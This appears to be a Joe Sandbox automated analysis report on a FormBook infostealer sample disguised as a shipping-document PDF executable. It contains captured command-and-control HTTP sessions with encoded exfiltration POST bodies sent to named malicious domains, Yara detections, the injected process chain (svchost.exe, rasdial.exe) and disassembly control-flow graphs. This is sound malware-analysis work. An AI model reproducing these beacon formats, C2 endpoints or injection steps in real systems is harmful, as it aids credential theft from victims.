                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP= [TRUNCATED]
                                                                                                                    Sep 30, 2024 19:59:54.593997002 CEST | 720 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.0
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:54 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 555
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    48 | 192.168.2.5 | 49760 | 144.34.186.85 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 19:59:56.545656919 CEST | 476 | OUT | GET /ni9w/?FbuX5DnP=8RaSk5tWi66Sq48MhHZUoNqLIlgjLo7w7AJBRYL2j4srPIRV3wjO+oo3VCeYgIIWRIVLwvpyy/VAIW0MNnFhP5IMZ0bC4qCM9jFMkTpJYlgGjxgR3domNTZU3RfMxSMm9A==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.h5hph710am.site
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:59:57.106379032 CEST | 720 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.0
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:57 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 555
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    49 | 192.168.2.5 | 49761 | 136.143.186.12 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 20:00:02.520931959 CEST | 734 | OUT | POST /1q08/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.lanxuanz.tech
                                                                                                                    Origin: http://www.lanxuanz.tech
                                                                                                                    Referer: http://www.lanxuanz.tech/1q08/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=pTM1zeR2Sjipb15cj4uffpXC5JxsobyM3qyh9v7AKm5pnBPSJVdPMMCkaIxubgDxjw3gMVs5HnS7P1bK29j08ybvaM5cQPJgDxEaKeDSxqcT6c1vG+3MNyvC4XrRea82yVqUTZZuK4/u6aAg6ZL0nz7cDMUnqpY/H7eLrLcIZFV5ZZQybJiZ1m4hfPoP6MQm8amrxd0=
                                                                                                                    Sep 30, 2024 20:00:03.140939951 CEST | 1236 | IN | HTTP/1.1 404
                                                                                                                    Server: ZGS
                                                                                                                    Date: Mon, 30 Sep 2024 18:00:03 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: zalb_8ae64e9492=346483e803ff107bf3906cbcefa288fe; Path=/
                                                                                                                    Set-Cookie: csrfc=502372df-60e1-4a89-9609-263b54d1aec4;path=/;priority=high
                                                                                                                    Set-Cookie: _zcsr_tmp=502372df-60e1-4a89-9609-263b54d1aec4;path=/;SameSite=Strict;priority=high
                                                                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                    vary: accept-encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Sep 30, 2024 20:00:03.140964031 CEST | 723 | IN |


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    50 | 192.168.2.5 | 49762 | 136.143.186.12 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 20:00:05.067574978 CEST | 754 | OUT | POST /1q08/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.lanxuanz.tech
                                                                                                                    Origin: http://www.lanxuanz.tech
                                                                                                                    Referer: http://www.lanxuanz.tech/1q08/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Ascii: FbuX5DnP=pTM1zeR2SjipbVpcv/CfIZXB1pxs+ryI3quh9uPqK1dppDnSOn1PLMCkVoxrVAD2jwroMX45Hn27P0LK2K/79ibpWs5eN/JgDxEaKeX4xqET6tFvFajPOyvF9nrRaa8yyVq6TYEJK+zu6eMg5Mr3uz7SccVSq5JAFra8vItpOCx4RP9YBrqxmGUZPcg4r8xPm52bvKgKZg0u00TgSYyb725sJiMC
                                                                                                                    Sep 30, 2024 20:00:05.664117098 CEST | 1236 | IN | HTTP/1.1 404
                                                                                                                    Server: ZGS
                                                                                                                    Date: Mon, 30 Sep 2024 18:00:05 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: zalb_8ae64e9492=cd858cf068bec389eea549b00143a3a9; Path=/
                                                                                                                    Set-Cookie: csrfc=7eed4975-6130-49bc-87d4-749b053c45db;path=/;priority=high
                                                                                                                    Set-Cookie: _zcsr_tmp=7eed4975-6130-49bc-87d4-749b053c45db;path=/;SameSite=Strict;priority=high
                                                                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                    vary: accept-encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Sep 30, 2024 20:00:05.664731026 CEST | 723 | IN |


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    51 | 192.168.2.5 | 49763 | 136.143.186.12 | 80 | 4508 | C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Sep 30, 2024 20:00:07.612725973 CEST | 1771 | OUT | POST /1q08/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.lanxuanz.tech
                                                                                                                    Origin: http://www.lanxuanz.tech
                                                                                                                    Referer: http://www.lanxuanz.tech/1q08/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
Timestamp: Sep 30, 2024 20:00:08.221538067 CEST
Bytes transferred: 549
Direction: IN
Data:
HTTP/1.1 400
                                                                                                                    Server: ZGS
                                                                                                                    Date: Mon, 30 Sep 2024 18:00:08 GMT
                                                                                                                    Content-Type: text/html;charset=ISO-8859-1
                                                                                                                    Content-Length: 80
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: zalb_8ae64e9492=d2341ff8556820e5fe7583c4c06e32ae; Path=/
                                                                                                                    Set-Cookie: csrfc=4605a47d-6d9c-42db-bc67-e09de93ef04a;path=/;priority=high
                                                                                                                    Set-Cookie: _zcsr_tmp=4605a47d-6d9c-42db-bc67-e09de93ef04a;path=/;SameSite=Strict;priority=high
                                                                                                                    Set-Cookie: JSESSIONID=EBE519C6F1B0E0C817DE24A629C04189; Path=/; HttpOnly
                                                                                                                    Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}



                                                                                                                    Target ID:0
                                                                                                                    Start time:13:56:00
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Users\user\Desktop\z4Shipping_document_pdf.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\z4Shipping_document_pdf.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:1'400'925 bytes
                                                                                                                    MD5 hash:AEB5E672510E739F463553E45D7F7283
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:13:56:05
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\z4Shipping_document_pdf.exe"
                                                                                                                    Imagebase:0x30000
                                                                                                                    File size:46'504 bytes
                                                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:4
                                                                                                                    Start time:13:56:37
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe"
                                                                                                                    Imagebase:0x740000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:5
                                                                                                                    Start time:13:56:38
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Windows\SysWOW64\rasdial.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                                                                                                                    Imagebase:0x3f0000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    Target ID:7
                                                                                                                    Start time:13:56:52
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe"
                                                                                                                    Imagebase:0x740000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:8
                                                                                                                    Start time:13:57:03
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                    Imagebase:0x7ff79f9e0000
                                                                                                                    File size:676'768 bytes
                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true


                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.3%
                                                                                                                      Dynamic/Decrypted Code Coverage:5.6%
                                                                                                                      Signature Coverage:14.5%
                                                                                                                      Total number of Nodes:124
                                                                                                                      Total number of Limit Nodes:7

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: /$/
                                                                                                                      • API String ID: 0-2523464752

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 216 417683-41769f 217 4176a7-4176ac 216->217 218 4176a2 call 42f263 216->218 219 4176b2-4176c0 call 42f863 217->219 220 4176ae-4176b1 217->220 218->217 223 4176d0-4176e1 call 42dbe3 219->223 224 4176c2-4176cd call 42fb03 219->224 229 4176e3-4176f7 LdrLoadDll 223->229 230 4176fa-4176fd 223->230 224->223 229->230
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176F5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: a```
                                                                                                                      • API String ID: 0-3259403941

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 293 42c4b3-42c4ec call 404a43 call 42d6e3 NtClose
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C4E7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 307 3372b60-3372b6c LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 413ea7-413ea9 1 413f27-413f4d call 424dc3 0->1 2 413eab-413ead 0->2 11 413f6d-413f73 1->11 12 413f4f-413f5e PostThreadMessageW 1->12 4 413f23 2->4 5 413eaf-413ebb 2->5 4->1 7 413e50-413e5f 5->7 8 413ebd-413ec2 5->8 9 413e61-413e65 7->9 10 413e9e-413ea6 7->10 13 413ec4-413ec9 8->13 14 413eca-413ed4 8->14 9->10 10->0 12->11 16 413f60-413f6a 12->16 13->14 16->11
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(1FZhY82B,00000111,00000000,00000000), ref: 00413F5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 1FZhY82B$1FZhY82B
                                                                                                                      • API String ID: 1836367815-1981548960

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(1FZhY82B,00000111,00000000,00000000), ref: 00413F5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 1FZhY82B$1FZhY82B
                                                                                                                      • API String ID: 1836367815-1981548960

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 32 413ee3-413ef5 33 413efd-413f4d call 42f013 call 417683 call 4049b3 call 424dc3 32->33 34 413ef8 call 42e603 32->34 43 413f6d-413f73 33->43 44 413f4f-413f5e PostThreadMessageW 33->44 34->33 44->43 46 413f60-413f6a 44->46 46->43
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(1FZhY82B,00000111,00000000,00000000), ref: 00413F5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 1FZhY82B$1FZhY82B
                                                                                                                      • API String ID: 1836367815-1981548960

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 47 413f74-413f7c 48 413fb4-413fb8 47->48 49 413f7e 47->49 50 413f80 49->50 51 413f59-413f5e PostThreadMessageW 49->51 54 413f82-413f89 50->54 55 413f3c-413f4d 50->55 52 413f60-413f6a 51->52 53 413f6d-413f73 51->53 52->53 58 413f8b-413f8f 54->58 55->53 56 413f4f-413f54 55->56 56->51 59 413f91-413f96 58->59 60 413fad-413fb3 58->60 59->60 61 413f98-413f9d 59->61 60->48 60->58 61->60 62 413f9f-413fa6 61->62 63 413fb9-413fbc 62->63 64 413fa8-413fab 62->64 64->60 64->63
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(1FZhY82B,00000111,00000000,00000000), ref: 00413F5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 1FZhY82B$1FZhY82B
                                                                                                                      • API String ID: 1836367815-1981548960

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 288 42c803-42c841 call 404a43 call 42d6e3 RtlFreeHeap
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3534F845,00000007,00000000,00000004,00000000,00416F01,000000F4), ref: 0042C83C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 283 42c7b3-42c7f4 call 404a43 call 42d6e3 RtlAllocateHeap
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(?,0041E4BE,?,?,00000000,?,0041E4BE,?,?,?), ref: 0042C7EF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 298 42c843-42c87c call 404a43 call 42d6e3 ExitProcess
                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,3F7BF990,?,?,3F7BF990), ref: 0042C877
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 303 3372c0a-3372c0f 304 3372c11-3372c18 303->304 305 3372c1f-3372c26 LdrInitializeThunk 303->305
